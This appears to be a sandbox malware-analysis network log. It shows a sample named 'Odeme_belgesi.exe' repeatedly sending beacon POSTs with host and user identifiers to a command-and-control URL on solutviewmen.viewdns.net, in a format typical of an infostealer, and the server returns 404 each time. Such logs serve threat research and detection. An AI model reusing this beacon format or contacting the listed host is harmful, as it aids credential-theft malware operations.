              Oct 1, 2024 10:56:21.724112034 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:21.729047060 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:22.785677910 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:55 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              68192.168.2.44980545.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:22.927316904 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:22.932406902 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:23.757464886 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:55 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              69192.168.2.44980645.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:23.909893990 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:23.914706945 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:27.643047094 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:59 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              70192.168.2.44980745.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:27.785759926 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:27.790640116 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:28.561955929 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:00 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              71192.168.2.44980845.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:28.712415934 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:28.717307091 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:29.396918058 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:01 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              72192.168.2.44980945.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:29.543512106 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:29.548372030 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:30.238183975 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:02 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              73192.168.2.44981045.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:30.398751020 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:30.403711081 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:31.057346106 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:03 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              74192.168.2.44981145.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:31.355782986 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:31.360697985 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:32.074229002 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:04 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              75192.168.2.44981245.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:32.239622116 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:32.244487047 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:32.917283058 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:05 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              76192.168.2.44981345.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:33.073720932 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:33.078751087 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:33.794236898 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:06 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              77192.168.2.44981445.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:34.259226084 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:34.264055014 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:34.954164982 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:07 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              78192.168.2.44981545.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:35.113996029 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:35.118822098 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:35.846981049 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:08 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              79192.168.2.44981645.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:36.002137899 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:36.007121086 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:36.897743940 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:09 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              80192.168.2.44981745.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:37.072134018 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:37.076988935 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:37.826824903 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:10 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              81192.168.2.44981845.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:37.988904953 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:37.993838072 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:38.657680035 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:10 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              82192.168.2.44981945.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:38.812674999 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:38.817576885 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:39.503447056 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:11 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              83192.168.2.44982045.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:39.669230938 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:39.675483942 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:40.380754948 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:12 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              84192.168.2.44982145.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:40.538661957 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:40.543639898 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:41.310524940 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:13 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              85192.168.2.44982245.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:41.464965105 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:41.469899893 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:42.196302891 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:14 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              86192.168.2.44982345.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:42.350737095 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:42.355680943 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:43.188508034 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:15 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              87192.168.2.44982445.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:43.341423035 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:43.346923113 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:44.087699890 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:27:16 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              88192.168.2.44982545.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:44.245318890 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
